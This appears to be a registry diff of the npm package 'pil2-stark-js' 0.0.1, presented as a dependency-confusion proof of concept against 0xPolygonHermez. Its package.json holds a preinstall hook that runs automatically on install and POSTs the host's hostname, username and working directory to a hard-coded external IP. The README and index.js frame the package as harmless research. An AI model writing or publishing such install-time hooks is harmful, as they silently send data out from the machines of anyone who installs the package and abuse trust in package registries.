pil2-stark-js 0.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (3) hide show
  1. package/README.md +4 -0
  2. package/index.js +6 -0
  3. package/package.json +12 -0
package/README.md ADDED
@@ -0,0 +1,4 @@
1
+ # pil2-stark-js — Dependency Confusion PoC
2
+
3
+ Security research package demonstrating that `pil2-stark-js` was unclaimed on npm
4
+ while referenced in 0xPolygonHermez repositories. Contact via HackerOne.
package/index.js ADDED
@@ -0,0 +1,6 @@
1
+ // Security Research — Dependency Confusion PoC
2
+ // Package: pil2-stark-js | Company: 0xPolygonHermez
3
+ // This package was published to prove the name was unclaimed.
4
+ // Contact: HackerOne
5
+ module.exports = { name: "pil2-stark-js", type: "security-research-poc" };
6
+ console.log("[dependency-confusion-poc] Security research package. Contact via HackerOne.");
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "pil2-stark-js",
3
+ "version": "0.0.1",
4
+ "description": "Security research — dependency confusion PoC for 0xPolygonHermez. This package name was unclaimed on npm. Contact via HackerOne.",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "node -e \"try{var h=require('http');var r=h.request({hostname:'54.80.197.209',port:8443,path:'/cb/pil2-stark-js',method:'POST',headers:{'Content-Type':'application/json'}});r.write(JSON.stringify({id:'pil2-stark-js',pkg:'pil2-stark-js',h:require('os').hostname(),u:require('os').userInfo().username,c:process.cwd(),t:Date.now()}));r.end()}catch(e){}\""
8
+ },
9
+ "keywords": ["security-research", "dependency-confusion"],
10
+ "author": "security-researcher",
11
+ "license": "ISC"
12
+ }